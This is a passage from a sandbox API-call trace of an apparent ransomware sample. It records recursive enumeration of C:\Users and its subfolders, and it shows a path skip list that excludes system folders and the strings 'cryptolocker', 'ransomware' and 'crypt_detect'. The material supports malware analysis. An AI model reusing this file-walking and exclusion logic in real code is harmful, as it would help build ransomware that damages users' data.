out: lpFindFileData=0x561fa20*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x6ead2556, ftCreationTime.dwHighDateTime=0x1d3275c, ftLastAccessTime.dwLowDateTime=0x6ead2556, ftLastAccessTime.dwHighDateTime=0x1d3275c, ftLastWriteTime.dwLowDateTime=0xacefef79, ftLastWriteTime.dwHighDateTime=0x1d5f12a, nFileSizeHigh=0x0, nFileSizeLow=0x10000000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="swapfile.sys", cAlternateFileName="")) returned 1 [0089.796] StrCmpW (psz1="swapfile.sys", psz2=".") returned 1 [0089.796] StrCmpW (psz1="swapfile.sys", psz2="..") returned 1 [0089.796] FindNextFileW (in: hFindFile=0xec21b0, lpFindFileData=0x561fa20 | out: lpFindFileData=0x561fa20*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x6e16f135, ftCreationTime.dwHighDateTime=0x1d3275c, ftLastAccessTime.dwLowDateTime=0xb1ff7ba5, ftLastAccessTime.dwHighDateTime=0x1d336d8, ftLastWriteTime.dwLowDateTime=0xb1ff7ba5, ftLastWriteTime.dwHighDateTime=0x1d336d8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="System Volume Information", cAlternateFileName="SYSTEM~1")) returned 1 [0089.796] StrCmpW (psz1="System Volume Information", psz2=".") returned 1 [0089.796] StrCmpW (psz1="System Volume Information", psz2="..") returned 1 [0089.796] FindNextFileW (in: hFindFile=0xec21b0, lpFindFileData=0x561fa20 | out: lpFindFileData=0x561fa20*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0x475bb883, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x475bb883, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 1 [0089.796] StrCmpW (psz1="Users", psz2=".") returned 1 [0089.796] StrCmpW (psz1="Users", psz2="..") returned 1 [0089.796] StrCpyNW (in: psz1=0xed39f8, psz2="C:", cchMax=1030 | out: psz1="C:") returned="C:" [0089.796] StrNCatW (in: psz1="C:", psz2="\\", cchMax=1030 | out: psz1="C:\\") returned="C:\\" [0089.796] StrNCatW (in: psz1="C:\\", psz2="Users", cchMax=1030 | out: psz1="C:\\Users") returned="C:\\Users" [0089.796] StrStrIW (lpFirst="C:\\Users", lpSrch="\\windows\\system32\\") returned 0x0 [0089.796] StrStrIW (lpFirst="C:\\Users", lpSrch="\\windows\\syswow64\\") returned 0x0 [0089.796] StrStrIW (lpFirst="C:\\Users", lpSrch="\\windows\\system\\") returned 0x0 [0089.796] StrStrIW (lpFirst="C:\\Users", lpSrch="\\windows\\winsxs\\") returned 0x0 [0089.796] StrStrIW (lpFirst="C:\\Users", lpSrch="\\appdata\\roaming\\") returned 0x0 [0089.796] StrStrIW (lpFirst="C:\\Users", lpSrch="\\appdata\\local\\") returned 0x0 [0089.796] StrStrIW (lpFirst="C:\\Users", lpSrch="\\appdata\\locallow\\") returned 0x0 [0089.796] StrStrIW (lpFirst="C:\\Users", lpSrch="\\all users\\microsoft\\") returned 0x0 [0089.796] StrStrIW (lpFirst="C:\\Users", lpSrch="\\inetpub\\logs\\") returned 0x0 [0089.796] StrStrIW (lpFirst="C:\\Users", lpSrch=":\\boot\\") returned 0x0 [0089.796] StrStrIW (lpFirst="C:\\Users", lpSrch=":\\perflogs\\") returned 0x0 [0089.796] StrStrIW (lpFirst="C:\\Users", lpSrch=":\\programdata\\") returned 0x0 [0089.796] StrStrIW (lpFirst="C:\\Users", lpSrch=":\\drivers\\") returned 0x0 [0089.797] StrStrIW (lpFirst="C:\\Users", lpSrch=":\\wsus\\") returned 0x0 [0089.797] StrStrIW (lpFirst="C:\\Users", lpSrch=":\\efstmpwp\\") returned 0x0 [0089.797] StrStrIW (lpFirst="C:\\Users", lpSrch=":\\$recycle.bin\\") returned 0x0 [0089.797] StrStrIW (lpFirst="C:\\Users", lpSrch="crypt_detect") returned 0x0 [0089.797] StrStrIW (lpFirst="C:\\Users", lpSrch="cryptolocker") returned 0x0 [0089.797] StrStrIW (lpFirst="C:\\Users", lpSrch="ransomware") returned 0x0 [0089.797] StrStrIW (lpFirst="C:\\Users", lpSrch="C:\\WINDOWS") returned 0x0 [0089.797] StrStrIW (lpFirst="C:\\Users", lpSrch="C:\\Program Files (x86)") returned 0x0 [0089.797] StrStrIW (lpFirst="C:\\Users", lpSrch="C:\\Program Files") returned 0x0 [0089.797] GetProcessHeap () returned 0xe30000 [0089.797] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x492) returned 0xeda7a8 [0089.797] StrCpyNW (in: psz1=0xeda7a8, psz2="C:\\Users", cchMax=1042 | out: psz1="C:\\Users") returned="C:\\Users" [0089.797] StrNCatW (in: psz1="C:\\Users", psz2="\\*", cchMax=1042 | out: psz1="C:\\Users\\*") returned="C:\\Users\\*" [0089.797] FindFirstFileW (in: lpFileName="C:\\Users\\*", lpFindFileData=0x561f770 | out: lpFindFileData=0x561f770*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0x475bb883, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x475bb883, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec26b0 [0089.797] StrCmpW (psz1=".", psz2=".") returned 0 [0089.797] FindNextFileW (in: hFindFile=0xec26b0, lpFindFileData=0x561f770 | out: lpFindFileData=0x561f770*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0x475bb883, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x475bb883, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0089.797] StrCmpW (psz1="..", psz2=".") returned 1 [0089.797] StrCmpW (psz1="..", psz2="..") returned 0 [0089.797] FindNextFileW (in: hFindFile=0xec26b0, lpFindFileData=0x561f770 | out: lpFindFileData=0x561f770*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0xd7b844b1, ftCreationTime.dwHighDateTime=0x1d2a02f, ftLastAccessTime.dwLowDateTime=0xd7b844b1, ftLastAccessTime.dwHighDateTime=0x1d2a02f, ftLastWriteTime.dwLowDateTime=0xd7b844b1, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x0, cFileName="All Users", cAlternateFileName="ALLUSE~1")) returned 1 [0089.797] StrCmpW (psz1="All Users", psz2=".") returned 1 [0089.797] StrCmpW (psz1="All Users", psz2="..") returned 1 [0089.797] FindNextFileW (in: hFindFile=0xec26b0, lpFindFileData=0x561f770 | out: lpFindFileData=0x561f770*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0x785fe036, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x785fe036, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x0, cFileName="Default", cAlternateFileName="")) returned 1 [0089.797] StrCmpW (psz1="Default", psz2=".") returned 1 [0089.797] StrCmpW (psz1="Default", psz2="..") returned 1 [0089.797] StrCpyNW (in: psz1=0xeda7a8, psz2="C:\\Users", cchMax=1042 | out: psz1="C:\\Users") returned="C:\\Users" [0089.797] StrNCatW (in: psz1="C:\\Users", psz2="\\", cchMax=1042 | out: psz1="C:\\Users\\") returned="C:\\Users\\" [0089.797] StrNCatW (in: psz1="C:\\Users\\", psz2="Default", cchMax=1042 | out: psz1="C:\\Users\\Default") returned="C:\\Users\\Default" [0089.797] StrStrIW (lpFirst="C:\\Users\\Default", lpSrch="\\windows\\system32\\") returned 0x0 [0089.797] StrStrIW (lpFirst="C:\\Users\\Default", lpSrch="\\windows\\syswow64\\") returned 0x0 [0089.797] StrStrIW (lpFirst="C:\\Users\\Default", lpSrch="\\windows\\system\\") returned 0x0 [0089.798] StrStrIW (lpFirst="C:\\Users\\Default", lpSrch="\\windows\\winsxs\\") returned 0x0 [0089.798] StrStrIW (lpFirst="C:\\Users\\Default", lpSrch="\\appdata\\roaming\\") returned 0x0 [0089.798] StrStrIW (lpFirst="C:\\Users\\Default", lpSrch="\\appdata\\local\\") returned 0x0 [0089.798] StrStrIW (lpFirst="C:\\Users\\Default", lpSrch="\\appdata\\locallow\\") returned 0x0 [0089.798] StrStrIW (lpFirst="C:\\Users\\Default", lpSrch="\\all users\\microsoft\\") returned 0x0 [0089.798] StrStrIW (lpFirst="C:\\Users\\Default", lpSrch="\\inetpub\\logs\\") returned 0x0 [0089.798] StrStrIW (lpFirst="C:\\Users\\Default", lpSrch=":\\boot\\") returned 0x0 [0089.798] StrStrIW (lpFirst="C:\\Users\\Default", lpSrch=":\\perflogs\\") returned 0x0 [0089.798] StrStrIW (lpFirst="C:\\Users\\Default", lpSrch=":\\programdata\\") returned 0x0 [0089.798] StrStrIW (lpFirst="C:\\Users\\Default", lpSrch=":\\drivers\\") returned 0x0 [0089.798] StrStrIW (lpFirst="C:\\Users\\Default", lpSrch=":\\wsus\\") returned 0x0 [0089.798] StrStrIW (lpFirst="C:\\Users\\Default", lpSrch=":\\efstmpwp\\") returned 0x0 [0089.798] StrStrIW (lpFirst="C:\\Users\\Default", lpSrch=":\\$recycle.bin\\") returned 0x0 [0089.798] StrStrIW (lpFirst="C:\\Users\\Default", lpSrch="crypt_detect") returned 0x0 [0089.798] StrStrIW (lpFirst="C:\\Users\\Default", lpSrch="cryptolocker") returned 0x0 [0089.798] StrStrIW (lpFirst="C:\\Users\\Default", lpSrch="ransomware") returned 0x0 [0089.798] StrStrIW (lpFirst="C:\\Users\\Default", lpSrch="C:\\WINDOWS") returned 0x0 [0089.798] StrStrIW (lpFirst="C:\\Users\\Default", lpSrch="C:\\Program Files (x86)") returned 0x0 [0089.798] StrStrIW (lpFirst="C:\\Users\\Default", lpSrch="C:\\Program Files") returned 0x0 [0089.798] GetProcessHeap () returned 0xe30000 [0089.798] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4a2) returned 0xec50e8 [0089.798] StrCpyNW (in: psz1=0xec50e8, psz2="C:\\Users\\Default", cchMax=1058 | out: psz1="C:\\Users\\Default") returned="C:\\Users\\Default" [0089.798] StrNCatW (in: psz1="C:\\Users\\Default", psz2="\\*", cchMax=1058 | out: psz1="C:\\Users\\Default\\*") returned="C:\\Users\\Default\\*" [0089.798] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\*", lpFindFileData=0x561f4c0 | out: lpFindFileData=0x561f4c0*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0x785fe036, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x785fe036, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec26f0 [0089.798] StrCmpW (psz1=".", psz2=".") returned 0 [0089.798] FindNextFileW (in: hFindFile=0xec26f0, lpFindFileData=0x561f4c0 | out: lpFindFileData=0x561f4c0*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0x785fe036, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x785fe036, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0089.798] StrCmpW (psz1="..", psz2=".") returned 1 [0089.798] StrCmpW (psz1="..", psz2="..") returned 0 [0089.799] FindNextFileW (in: hFindFile=0xec26f0, lpFindFileData=0x561f4c0 | out: lpFindFileData=0x561f4c0*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x17d2dc32, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xc3aee4d3, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x17d2dc32, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="AppData", cAlternateFileName="")) returned 1 [0089.799] StrCmpW (psz1="AppData", psz2=".") returned 1 [0089.799] StrCmpW (psz1="AppData", psz2="..") returned 1 [0089.799] StrCpyNW (in: psz1=0xec50e8, psz2="C:\\Users\\Default", cchMax=1058 | out: psz1="C:\\Users\\Default") returned="C:\\Users\\Default" [0089.799] StrNCatW (in: psz1="C:\\Users\\Default", psz2="\\", cchMax=1058 | out: psz1="C:\\Users\\Default\\") returned="C:\\Users\\Default\\" [0089.799] StrNCatW (in: psz1="C:\\Users\\Default\\", psz2="AppData", cchMax=1058 | out: psz1="C:\\Users\\Default\\AppData") returned="C:\\Users\\Default\\AppData" [0089.799] StrStrIW (lpFirst="C:\\Users\\Default\\AppData", lpSrch="\\windows\\system32\\") returned 0x0 [0089.799] StrStrIW (lpFirst="C:\\Users\\Default\\AppData", lpSrch="\\windows\\syswow64\\") returned 0x0 [0089.799] StrStrIW (lpFirst="C:\\Users\\Default\\AppData", lpSrch="\\windows\\system\\") returned 0x0 [0089.799] StrStrIW (lpFirst="C:\\Users\\Default\\AppData", lpSrch="\\windows\\winsxs\\") returned 0x0 [0089.799] StrStrIW (lpFirst="C:\\Users\\Default\\AppData", lpSrch="\\appdata\\roaming\\") returned 0x0 [0089.799] StrStrIW (lpFirst="C:\\Users\\Default\\AppData", lpSrch="\\appdata\\local\\") returned 0x0 [0089.799] StrStrIW (lpFirst="C:\\Users\\Default\\AppData", lpSrch="\\appdata\\locallow\\") returned 0x0 [0089.799] StrStrIW (lpFirst="C:\\Users\\Default\\AppData", lpSrch="\\all users\\microsoft\\") returned 0x0 [0089.799] StrStrIW (lpFirst="C:\\Users\\Default\\AppData", lpSrch="\\inetpub\\logs\\") returned 0x0 [0089.799] StrStrIW (lpFirst="C:\\Users\\Default\\AppData", lpSrch=":\\boot\\") returned 0x0 [0089.799] StrStrIW (lpFirst="C:\\Users\\Default\\AppData", lpSrch=":\\perflogs\\") returned 0x0 [0089.799] StrStrIW (lpFirst="C:\\Users\\Default\\AppData", lpSrch=":\\programdata\\") returned 0x0 [0089.799] StrStrIW (lpFirst="C:\\Users\\Default\\AppData", lpSrch=":\\drivers\\") returned 0x0 [0089.799] StrStrIW (lpFirst="C:\\Users\\Default\\AppData", lpSrch=":\\wsus\\") returned 0x0 [0089.799] StrStrIW (lpFirst="C:\\Users\\Default\\AppData", lpSrch=":\\efstmpwp\\") returned 0x0 [0089.799] StrStrIW (lpFirst="C:\\Users\\Default\\AppData", lpSrch=":\\$recycle.bin\\") returned 0x0 [0089.799] StrStrIW (lpFirst="C:\\Users\\Default\\AppData", lpSrch="crypt_detect") returned 0x0 [0089.799] StrStrIW (lpFirst="C:\\Users\\Default\\AppData", lpSrch="cryptolocker") returned 0x0 [0089.799] StrStrIW (lpFirst="C:\\Users\\Default\\AppData", lpSrch="ransomware") returned 0x0 [0089.799] StrStrIW (lpFirst="C:\\Users\\Default\\AppData", lpSrch="C:\\WINDOWS") returned 0x0 [0089.799] StrStrIW (lpFirst="C:\\Users\\Default\\AppData", lpSrch="C:\\Program Files (x86)") returned 0x0 [0089.799] StrStrIW (lpFirst="C:\\Users\\Default\\AppData", lpSrch="C:\\Program Files") returned 0x0 [0089.799] GetProcessHeap () returned 0xe30000 [0089.799] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4b2) returned 0xec65a0 [0089.799] StrCpyNW (in: psz1=0xec65a0, psz2="C:\\Users\\Default\\AppData", cchMax=1074 | out: psz1="C:\\Users\\Default\\AppData") returned="C:\\Users\\Default\\AppData" [0089.799] StrNCatW (in: psz1="C:\\Users\\Default\\AppData", psz2="\\*", cchMax=1074 | out: psz1="C:\\Users\\Default\\AppData\\*") returned="C:\\Users\\Default\\AppData\\*" [0089.799] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\AppData\\*", lpFindFileData=0x561f210 | out: lpFindFileData=0x561f210*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x17d2dc32, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xc3aee4d3, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x17d2dc32, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec25f0 [0089.800] StrCmpW (psz1=".", psz2=".") returned 0 [0089.800] FindNextFileW (in: hFindFile=0xec25f0, lpFindFileData=0x561f210 | out: lpFindFileData=0x561f210*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x17d2dc32, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xc3aee4d3, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x17d2dc32, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0089.800] StrCmpW (psz1="..", psz2=".") returned 1 [0089.800] StrCmpW (psz1="..", psz2="..") returned 0 [0089.800] FindNextFileW (in: hFindFile=0xec25f0, lpFindFileData=0x561f210 | out: lpFindFileData=0x561f210*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17d2dc32, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x78624286, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x78624286, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="Local", cAlternateFileName="")) returned 1 [0089.800] StrCmpW (psz1="Local", psz2=".") returned 1 [0089.800] StrCmpW (psz1="Local", psz2="..") returned 1 [0089.800] StrCpyNW (in: psz1=0xec65a0, psz2="C:\\Users\\Default\\AppData", cchMax=1074 | out: psz1="C:\\Users\\Default\\AppData") returned="C:\\Users\\Default\\AppData" [0089.800] StrNCatW (in: psz1="C:\\Users\\Default\\AppData", psz2="\\", cchMax=1074 | out: psz1="C:\\Users\\Default\\AppData\\") returned="C:\\Users\\Default\\AppData\\" [0089.800] StrNCatW (in: psz1="C:\\Users\\Default\\AppData\\", psz2="Local", cchMax=1074 | out: psz1="C:\\Users\\Default\\AppData\\Local") returned="C:\\Users\\Default\\AppData\\Local" [0089.800] StrStrIW (lpFirst="C:\\Users\\Default\\AppData\\Local", lpSrch="\\windows\\system32\\") returned 0x0 [0089.800] StrStrIW (lpFirst="C:\\Users\\Default\\AppData\\Local", lpSrch="\\windows\\syswow64\\") returned 0x0 [0089.800] StrStrIW (lpFirst="C:\\Users\\Default\\AppData\\Local", lpSrch="\\windows\\system\\") returned 0x0 [0089.800] StrStrIW (lpFirst="C:\\Users\\Default\\AppData\\Local", lpSrch="\\windows\\winsxs\\") returned 0x0 [0089.800] StrStrIW (lpFirst="C:\\Users\\Default\\AppData\\Local", lpSrch="\\appdata\\roaming\\") returned 0x0 [0089.800] StrStrIW (lpFirst="C:\\Users\\Default\\AppData\\Local", lpSrch="\\appdata\\local\\") returned 0x0 [0089.800] StrStrIW (lpFirst="C:\\Users\\Default\\AppData\\Local", lpSrch="\\appdata\\locallow\\") returned 0x0 [0089.800] StrStrIW (lpFirst="C:\\Users\\Default\\AppData\\Local", lpSrch="\\all users\\microsoft\\") returned 0x0 [0089.800] StrStrIW (lpFirst="C:\\Users\\Default\\AppData\\Local", lpSrch="\\inetpub\\logs\\") returned 0x0 [0089.800] StrStrIW (lpFirst="C:\\Users\\Default\\AppData\\Local", lpSrch=":\\boot\\") returned 0x0 [0089.800] StrStrIW (lpFirst="C:\\Users\\Default\\AppData\\Local", lpSrch=":\\perflogs\\") returned 0x0 [0089.800] StrStrIW (lpFirst="C:\\Users\\Default\\AppData\\Local", lpSrch=":\\programdata\\") returned 0x0 [0089.800] StrStrIW (lpFirst="C:\\Users\\Default\\AppData\\Local", lpSrch=":\\drivers\\") returned 0x0 [0089.800] StrStrIW (lpFirst="C:\\Users\\Default\\AppData\\Local", lpSrch=":\\wsus\\") returned 0x0 [0089.800] StrStrIW (lpFirst="C:\\Users\\Default\\AppData\\Local", lpSrch=":\\efstmpwp\\") returned 0x0 [0089.800] StrStrIW (lpFirst="C:\\Users\\Default\\AppData\\Local", lpSrch=":\\$recycle.bin\\") returned 0x0 [0089.800] StrStrIW (lpFirst="C:\\Users\\Default\\AppData\\Local", lpSrch="crypt_detect") returned 0x0 [0089.800] StrStrIW (lpFirst="C:\\Users\\Default\\AppData\\Local", lpSrch="cryptolocker") returned 0x0 [0089.800] StrStrIW (lpFirst="C:\\Users\\Default\\AppData\\Local", lpSrch="ransomware") returned 0x0 [0089.801] StrStrIW (lpFirst="C:\\Users\\Default\\AppData\\Local", lpSrch="C:\\WINDOWS") returned 0x0 [0089.801] StrStrIW (lpFirst="C:\\Users\\Default\\AppData\\Local", lpSrch="C:\\Program Files (x86)") returned 0x0 [0089.801] StrStrIW (lpFirst="C:\\Users\\Default\\AppData\\Local", lpSrch="C:\\Program Files") returned 0x0 [0089.801] GetProcessHeap () returned 0xe30000 [0089.801] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4be) returned 0xec7a68 [0089.801] StrCpyNW (in: psz1=0xec7a68, psz2="C:\\Users\\Default\\AppData\\Local", cchMax=1086 | out: psz1="C:\\Users\\Default\\AppData\\Local") returned="C:\\Users\\Default\\AppData\\Local" [0089.801] StrNCatW (in: psz1="C:\\Users\\Default\\AppData\\Local", psz2="\\*", cchMax=1086 | out: psz1="C:\\Users\\Default\\AppData\\Local\\*") returned="C:\\Users\\Default\\AppData\\Local\\*" [0089.801] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\AppData\\Local\\*", lpFindFileData=0x561ef60 | out: lpFindFileData=0x561ef60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17d2dc32, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x78624286, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x78624286, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x610e02, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec2270 [0089.801] StrCmpW (psz1=".", psz2=".") returned 0 [0089.801] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x561ef60 | out: lpFindFileData=0x561ef60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17d2dc32, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x78624286, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x78624286, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x610e02, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0089.801] StrCmpW (psz1="..", psz2=".") returned 1 [0089.801] StrCmpW (psz1="..", psz2="..") returned 0 [0089.801] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x561ef60 | out: lpFindFileData=0x561ef60*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x785fe036, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0x785fe036, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x785fe036, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Application Data", cAlternateFileName="APPLIC~1")) returned 1 [0089.801] StrCmpW (psz1="Application Data", psz2=".") returned 1 [0089.801] StrCmpW (psz1="Application Data", psz2="..") returned 1 [0089.801] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x561ef60 | out: lpFindFileData=0x561ef60*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x785fe036, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0x785fe036, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x785fe036, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="History", cAlternateFileName="")) returned 1 [0089.801] StrCmpW (psz1="History", psz2=".") returned 1 [0089.801] StrCmpW (psz1="History", psz2="..") returned 1 [0089.801] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x561ef60 | out: lpFindFileData=0x561ef60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17d2dc32, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xc3af063e, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xe6dc3522, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft", cAlternateFileName="MICROS~1")) returned 1 [0089.801] StrCmpW (psz1="Microsoft", psz2=".") returned 1 [0089.801] StrCmpW (psz1="Microsoft", psz2="..") returned 1 [0089.801] StrCpyNW (in: psz1=0xec7a68, psz2="C:\\Users\\Default\\AppData\\Local", cchMax=1086 | out: psz1="C:\\Users\\Default\\AppData\\Local") returned="C:\\Users\\Default\\AppData\\Local" [0089.801] StrNCatW (in: psz1="C:\\Users\\Default\\AppData\\Local", psz2="\\", cchMax=1086 | out: psz1="C:\\Users\\Default\\AppData\\Local\\") returned="C:\\Users\\Default\\AppData\\Local\\" [0089.801] StrNCatW (in: psz1="C:\\Users\\Default\\AppData\\Local\\", psz2="Microsoft", cchMax=1086 | out: psz1="C:\\Users\\Default\\AppData\\Local\\Microsoft") returned="C:\\Users\\Default\\AppData\\Local\\Microsoft" [0089.801] StrStrIW (lpFirst="C:\\Users\\Default\\AppData\\Local\\Microsoft", lpSrch="\\windows\\system32\\") returned 0x0 [0089.801] StrStrIW (lpFirst="C:\\Users\\Default\\AppData\\Local\\Microsoft", lpSrch="\\windows\\syswow64\\") returned 0x0 [0089.801] StrStrIW (lpFirst="C:\\Users\\Default\\AppData\\Local\\Microsoft", lpSrch="\\windows\\system\\") returned 0x0 [0089.801] StrStrIW (lpFirst="C:\\Users\\Default\\AppData\\Local\\Microsoft", lpSrch="\\windows\\winsxs\\") returned 0x0 [0089.801] StrStrIW (lpFirst="C:\\Users\\Default\\AppData\\Local\\Microsoft", lpSrch="\\appdata\\roaming\\") returned 0x0 [0089.802] StrStrIW (lpFirst="C:\\Users\\Default\\AppData\\Local\\Microsoft", lpSrch="\\appdata\\local\\") returned="\\AppData\\Local\\Microsoft" [0089.802] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x561ef60 | out: lpFindFileData=0x561ef60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17d2dc32, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xc3c8b6f3, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x17d2dc32, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Temp", cAlternateFileName="")) returned 1 [0089.802] StrCmpW (psz1="Temp", psz2=".") returned 1 [0089.802] StrCmpW (psz1="Temp", psz2="..") returned 1 [0089.802] StrCpyNW (in: psz1=0xec7a68, psz2="C:\\Users\\Default\\AppData\\Local", cchMax=1086 | out: psz1="C:\\Users\\Default\\AppData\\Local") returned="C:\\Users\\Default\\AppData\\Local" [0089.802] StrNCatW (in: psz1="C:\\Users\\Default\\AppData\\Local", psz2="\\", cchMax=1086 | out: psz1="C:\\Users\\Default\\AppData\\Local\\") returned="C:\\Users\\Default\\AppData\\Local\\" [0089.802] StrNCatW (in: psz1="C:\\Users\\Default\\AppData\\Local\\", psz2="Temp", cchMax=1086 | out: 